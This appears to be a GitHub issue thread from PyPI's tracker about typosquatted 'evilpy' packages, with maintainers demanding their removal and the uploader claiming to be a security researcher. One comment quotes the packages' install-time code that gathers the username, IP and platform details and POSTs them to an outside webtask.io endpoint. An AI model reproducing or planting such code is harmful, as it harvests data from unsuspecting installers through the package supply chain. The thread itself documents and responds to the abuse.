Package spam #644
Comments
|
The packages seem mildly malicious as well: From their def fun():
username = getpass.getuser()
hostinfo = platform.uname()
filename = os.path.join(
tempfile.gettempdir(),
hashlib.md5(str(hostinfo).encode('utf-8', errors='ignore')).hexdigest()
)
if os.path.exists(filename):
return
try:
open(filename, 'w').write(b'')
except:
pass
try:
ip = request("https://enabledns.com/ip", method='GET')
except:
ip = socket.gethostname()
data = {
"title": "%s@%s" % (username, ip),
"body": "I shouldn't install caffe package, here is my host info: %s" % str(hostinfo)
}
headers = {
'Content-Type': 'application/json'
}
request(
url='https://wt-90ab2e5e0aca15fe3a2a6945e26eb256-0.run.webtask.io/evilpy',
method='POST',
data=json.dumps(data).encode("utf-8", errors='ignore'),
headers=headers
)
fun()Here's a full list of them: https://pypi.org/user/evilpy/ |
|
Hi, I build the fake package and allow me explain this later |
|
You are uploading fake packages, under the name evilpy, that harvest information from people who try to install them. I do not need an explanation I do ask that you remove them. |
|
@fate0 please remove those packages immediately or I will delete all of your packages and lock your account. |
Time to explainI am a Security Researcher and also a Python Programer. In the last few days, I upload several fake or evil package to PyPi to check out In the first edition, I using webtask.io to transfer data to cookiecutter-evil-pypackage, but this repository has been disabled by GitHub staff. In the second edition, I just upload the user data to my server, finding some place to publish the data. Today, I feel disappointed when I know someone has done this before: Typosquatting programming language package managers BUT, after one year past, NOTHING CHANGE !!! Every day there are still about 2200 people install the evil package @r1chardj0n3s I have remove all of the packages in PyPi, so let other guys add whatever the want. |
|
Thanks. |
|
He hasn't removed the packages. https://pypi.python.org/pypi/requirements-txt/1.1.1 |
|
All of the packages added by That #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import sys
import json
import setuptools
from setuptools.command.install import install
class AbortInstall(install):
def run(self):
raise SystemExit(
"[+] It looks like you try to install ztz without checking it.\n"
"[-] is that alright? \n"
"[*] Please visit http://evilpackage.fatezero.org/ \n"
"[/] Aborting installation."
)
setuptools.setup(
name="ztz",
version="0.1.1",
url="http://evilpackage.fatezero.org/",
author="fate0",
author_email="[email protected]",
description="Python wrapper for ztz",
long_description=open('README.rst').read(),
packages=setuptools.find_packages(),
cmdclass={
'install': AbortInstall
},
install_requires=[],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)So, not directly malicious, per-se, and not directly spyware, either. It also doesn't appear to directly contradict the PyPI terms of service, but IANAL. Information could still be harvested out of the public Google BigTable data about installers, though. |
|
I've removed the |
|
@jamadden @katelynsills @dstufft a detail info in here Package 钓鱼, You can see the detail how I bypass |
|
@dstufft BTW, |
|
Nobody had reported those names so I was unaware of them. I'll deal with them later tonight. |
The site is being spammed with fake packages like:
http://pypi.python.org/pypi/pygpu/0.1.0
http://pypi.python.org/pypi/tkinter/0.1.0
There are more, just look for the description:
"just for fun : )"
The text was updated successfully, but these errors were encountered: